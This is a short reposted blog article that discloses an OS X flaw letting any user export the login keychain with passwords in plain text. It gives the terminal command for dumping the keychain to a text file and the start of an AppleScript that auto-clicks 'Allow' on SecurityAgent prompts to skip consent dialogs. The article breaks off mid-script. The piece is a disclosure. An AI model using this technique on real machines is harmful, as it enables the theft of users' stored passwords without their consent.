Security Flaw in OS X displays all keychain passwords in plain text

Security Flaw in OS X displays all keychain passwords in plain textThis afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”. However, it was what I learned that shocked me the most.There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the username and passwords displayed in plain text. As of this writing, this method works in at least 10.10 and 10.11.5, and presumably at the least all iterations in between.The method consists of opening up terminal, and cutting and pasting the following code:security dump-keychain -d login.keychain > keychain.txtYou can circumvent all system dialogs by scripting that terminal command and adding the following:tell application “System Events”repeat while exists (processes where name is “SecurityAgent”)tell process “SecurityAgent”click button “Allow” of group


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/cG_9wyZv5Gk/security-flaw-in-os-x-displays-all-keychain-passwords-in-plain-text-a530b246e960

Original article

Comments are closed.

Proudly powered by WordPress | Theme: Baskerville 2 by Anders Noren.

Up ↑

%d bloggers like this: